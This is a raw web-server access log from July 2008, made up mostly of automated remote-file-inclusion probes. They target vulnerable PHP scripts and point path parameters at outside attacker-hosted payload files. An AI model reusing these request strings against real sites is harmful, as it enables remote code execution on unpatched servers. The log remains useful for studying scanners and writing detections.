213.254.226.234 - - [30/Jul/2008:21:17:23 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
201.130.79.132 - - [30/Jul/2008:21:18:07 -0500] "GET ///?custompluginfile%5B%5D=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 200 1244 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:21:18:07 -0500] "GET /logs/access_log.1214697600///?custompluginfile%5B%5D=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:21:18:07 -0500] "GET /logs/access_log.1214438400///?custompluginfile%5B%5D=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:21:18:07 -0500] "GET /logs///?custompluginfile%5B%5D=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 200 93421 "-""libwww-perl/5.805"
210.245.166.92 - - [30/Jul/2008:21:18:20 -0500] "GET /logs/access_log.1212883200//config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/general? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:21:18:20 -0500] "GET //config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/general? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:21:18:21 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/general? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
89.97.0.11 - - [30/Jul/2008:21:18:43 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 358 "-""libwww-perl/5.803"
64.246.52.46 - - [30/Jul/2008:21:19:20 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.808"
64.246.52.46 - - [30/Jul/2008:21:19:21 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
200.146.61.130 - - [30/Jul/2008:21:19:57 -0500] "GET /index.php?redir=http://sujianto.com/id.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:21:19:57 -0500] "GET /logs/index.php?redir=http://sujianto.com/id.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
85.214.59.54 - - [30/Jul/2008:21:21:09 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
85.214.59.54 - - [30/Jul/2008:21:21:09 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
208.98.1.100 - - [30/Jul/2008:21:21:22 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.813"
208.98.1.100 - - [30/Jul/2008:21:21:22 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.813"
210.245.166.92 - - [30/Jul/2008:21:21:31 -0500] "GET /logs/access_log.1214438400//config/dbutil.bck.php?confdir=http://www.adoradores.kit.net/general? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
201.130.79.132 - - [30/Jul/2008:21:22:02 -0500] "GET ///?custompluginfile%5B%5D=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 200 1244 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:21:22:02 -0500] "GET /logs/access_log.1214697600///?custompluginfile%5B%5D=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:21:22:03 -0500] "GET /logs///?custompluginfile%5B%5D=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 200 93421 "-""libwww-perl/5.805"
87.118.98.3 - - [30/Jul/2008:21:22:24 -0500] "GET /logs/access_log.1214697600///?custompluginfile%5B%5D=http://h1.ripway.com/Dev1l/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.186.169.135 - - [30/Jul/2008:21:22:24 -0500] "GET /logs/access_log.1212883200//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
89.186.169.135 - - [30/Jul/2008:21:22:25 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
89.186.169.135 - - [30/Jul/2008:21:22:25 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:21:22:29 -0500] "GET /logs/access_log.1214438400///?custompluginfile%5B%5D=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
87.118.98.3 - - [30/Jul/2008:21:22:40 -0500] "GET ///?custompluginfile%5B%5D=http://h1.ripway.com/Dev1l/id.txt???? HTTP/1.1" 200 1244 "-""libwww-perl/5.805"
87.118.98.3 - - [30/Jul/2008:21:22:40 -0500] "GET /logs/access_log.1214438400///?custompluginfile%5B%5D=http://h1.ripway.com/Dev1l/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
87.118.98.3 - - [30/Jul/2008:21:22:41 -0500] "GET /logs///?custompluginfile%5B%5D=http://h1.ripway.com/Dev1l/id.txt???? HTTP/1.1" 200 93421 "-""libwww-perl/5.805"
64.150.164.61 - - [30/Jul/2008:21:23:04 -0500] "GET /logs//netcat/require/s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
64.150.164.61 - - [30/Jul/2008:21:23:04 -0500] "GET /logs/access_log.1216598400//netcat/require/s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
64.150.164.61 - - [30/Jul/2008:21:23:04 -0500] "GET //netcat/require/s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
89.186.169.135 - - [30/Jul/2008:21:23:55 -0500] "GET /logs/access_log.1213142400//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
66.249.70.131 - - [30/Jul/2008:21:24:48 -0500] "GET /logs/access_log.1216252800 HTTP/1.1" 200 569597 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.246.52.46 - - [30/Jul/2008:21:25:09 -0500] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
64.246.52.46 - - [30/Jul/2008:21:25:11 -0500] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
72.248.189.82 - - [30/Jul/2008:21:25:42 -0500] "GET /vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
72.248.189.82 - - [30/Jul/2008:21:25:45 -0500] "GET /logs/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
72.248.189.82 - - [30/Jul/2008:21:25:45 -0500] "GET /logs/access_log.1213833600/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
202.30.194.70 - - [30/Jul/2008:21:26:06 -0500] "GET /logs/access_log.1216598400//netcat/require/s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
202.30.194.70 - - [30/Jul/2008:21:26:06 -0500] "GET //netcat/require/s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
202.30.194.70 - - [30/Jul/2008:21:26:06 -0500] "GET /logs//netcat/require/s_loadenv.inc.php?DOCUMENT_ROOT=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
202.168.58.126 - - [30/Jul/2008:21:26:08 -0500] "GET /costume/index1.htm HTTP/1.0" 200 21563 "http://www.google.com.au/search?hl=en&q=King+richard%27s+weapons+and+jewels&btnG=Search&meta=""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
64.246.52.46 - - [30/Jul/2008:21:26:27 -0500] "GET /logs/access_log.1214438400//contenido/classes/class.inuse.php?cfg[path][contenido]=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.808"
64.246.52.46 - - [30/Jul/2008:21:26:27 -0500] "GET //contenido/classes/class.inuse.php?cfg[path][contenido]=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
64.246.52.46 - - [30/Jul/2008:21:26:27 -0500] "GET /logs//contenido/classes/class.inuse.php?cfg[path][contenido]=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.808"
72.248.189.82 - - [30/Jul/2008:21:27:04 -0500] "GET /logs/access_log.1213920000/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
72.248.189.82 - - [30/Jul/2008:21:27:04 -0500] "GET /logs/access_log.1216339200/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
72.248.189.82 - - [30/Jul/2008:21:27:05 -0500] "GET /logs/access_log.1216080000/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
72.248.189.82 - - [30/Jul/2008:21:27:05 -0500] "GET /logs/access_log.1212278400/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
72.248.189.82 - - [30/Jul/2008:21:28:31 -0500] "GET /logs/access_log.1211155200/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
72.248.189.82 - - [30/Jul/2008:21:28:31 -0500] "GET /logs/access_log.1215043200/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
80.74.146.175 - - [30/Jul/2008:21:28:32 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
80.74.146.175 - - [30/Jul/2008:21:28:32 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
80.74.146.175 - - [30/Jul/2008:21:28:36 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
81.169.186.162 - - [30/Jul/2008:21:29:53 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:21:29:53 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:21:30:14 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:31:19 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
70.84.182.98 - - [30/Jul/2008:21:32:06 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://saltgum.com/test.txt? HTTP/1.1" 404 324 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
70.84.182.98 - - [30/Jul/2008:21:32:11 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://saltgum.com/test.txt? HTTP/1.1" 404 329 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
74.55.113.226 - - [30/Jul/2008:21:32:18 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
74.55.113.226 - - [30/Jul/2008:21:32:18 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
74.55.113.226 - - [30/Jul/2008:21:32:18 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.805"
74.55.113.226 - - [30/Jul/2008:21:32:18 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.805"
81.169.186.162 - - [30/Jul/2008:21:33:32 -0500] "GET /logs/errors.php?error=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:21:33:32 -0500] "GET /errors.php?error=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:33:53 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:33:53 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:33:58 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:33:58 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
62.112.193.46 - - [30/Jul/2008:21:34:28 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
62.112.193.46 - - [30/Jul/2008:21:34:28 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.805"
62.112.193.46 - - [30/Jul/2008:21:34:33 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
62.112.193.46 - - [30/Jul/2008:21:34:33 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.805"
85.239.113.1 - - [30/Jul/2008:21:34:33 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:34:34 -0500] "GET /phphtml.php?htmlclass_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:34:40 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:34:40 -0500] "GET /phphtml.php?htmlclass_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:21:34:51 -0500] "GET /logs/errors.php?error=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:21:34:52 -0500] "GET /errors.php?error=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:34:59 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.larisco.com/ha.txt?? HTTP/1.1" 200 93420 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:34:59 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.larisco.com/ha.txt?? HTTP/1.1" 200 93420 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:35:00 -0500] "GET //?path%5Bdocroot%5D=http://www.larisco.com/ha.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:35:00 -0500] "GET //?path%5Bdocroot%5D=http://www.larisco.com/ha.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
89.97.0.11 - - [30/Jul/2008:21:35:07 -0500] "GET /logs/access_log.1214438400//phphtml.php?htmlclass_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
89.97.0.11 - - [30/Jul/2008:21:35:25 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
89.97.0.11 - - [30/Jul/2008:21:35:26 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:21:35:33 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:21:35:33 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:36:14 -0500] "GET /errors.php?error=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:36:36 -0500] "GET /phphtml.php?htmlclass_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
210.245.166.92 - - [30/Jul/2008:21:38:18 -0500] "GET /logs/access_log.1214438400//newspublish/include.php?path%5Bdocroot%5D=http://www.adoradores.kit.net/general? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:21:38:18 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.adoradores.kit.net/general? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:21:38:19 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.adoradores.kit.net/general? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
81.169.186.162 - - [30/Jul/2008:21:38:42 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:21:38:42 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:38:56 -0500] "GET /logs/errors.php?error=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:38:56 -0500] "GET /errors.php?error=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:39:02 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:39:02 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:39:02 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:39:02 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:39:03 -0500] "GET /logs/errors.php?error=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:39:04 -0500] "GET /errors.php?error=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:21:40:12 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
77.235.37.163 - - [30/Jul/2008:21:41:03 -0500] "GET /logs/index.php?redir=http://www.theimageguide.com/uploads/id2.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
77.235.37.163 - - [30/Jul/2008:21:41:03 -0500] "GET /index.php?redir=http://www.theimageguide.com/uploads/id2.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
80.74.146.175 - - [30/Jul/2008:21:41:07 -0500] "GET //?path%5Bdocroot%5D=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
80.74.146.175 - - [30/Jul/2008:21:41:08 -0500] "GET /logs//?path%5Bdocroot%5D=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 200 93420 "-""libwww-perl/5.805"
81.169.186.162 - - [30/Jul/2008:21:42:48 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:21:42:48 -0500] "GET /phphtml.php?htmlclass_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:21:43:26 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.larisco.com/ha.txt?? HTTP/1.1" 200 93420 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:21:43:26 -0500] "GET //?path%5Bdocroot%5D=http://www.larisco.com/ha.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
77.235.37.163 - - [30/Jul/2008:21:44:04 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.theimageguide.com/uploads/arab.txt? HTTP/1.1" 200 93420 "-""libwww-perl/5.811"
77.235.37.163 - - [30/Jul/2008:21:44:04 -0500] "GET //?path%5Bdocroot%5D=http://www.theimageguide.com/uploads/arab.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
210.245.166.92 - - [30/Jul/2008:21:46:24 -0500] "GET /logs/access_log.1214438400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.adoradores.kit.net/general? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:21:46:24 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.adoradores.kit.net/general? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:21:46:25 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.adoradores.kit.net/general? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
64.246.52.46 - - [30/Jul/2008:21:46:40 -0500] "GET /logs/access_log.1214438400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 370 "-""libwww-perl/5.808"
64.246.52.46 - - [30/Jul/2008:21:46:40 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
64.246.52.46 - - [30/Jul/2008:21:46:40 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.808"
85.239.113.1 - - [30/Jul/2008:21:46:46 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:46:46 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:21:46:47 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
94.136.160.61 - - [30/Jul/2008:21:49:05 -0500] "GET /logs/index.php?redir=http://www.theimageguide.com/uploads/arab.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
94.136.160.61 - - [30/Jul/2008:21:49:06 -0500] "GET /index.php?redir=http://www.theimageguide.com/uploads/arab.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
210.245.166.92 - - [30/Jul/2008:21:51:43 -0500] "GET /logs/access_log.1213315200//newspublish/include.php?path%5Bdocroot%5D=http://www.adoradores.kit.net/general? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
65.55.208.139 - - [30/Jul/2008:21:52:01 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [30/Jul/2008:21:52:01 -0500] "GET /logs/access_log.1211500800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
210.245.166.92 - - [30/Jul/2008:21:58:42 -0500] "GET /logs/access_log.1212883200//faqsupport/samplefaqsupport.php?path[docroot]=http://www.adoradores.kit.net/general? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
12.196.98.16 - - [30/Jul/2008:21:58:54 -0500] "GET /logs//forums/photoplog/images/5/small/include/admin.lib.inc.php?site_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 335 "-""libwww-perl/5.53"
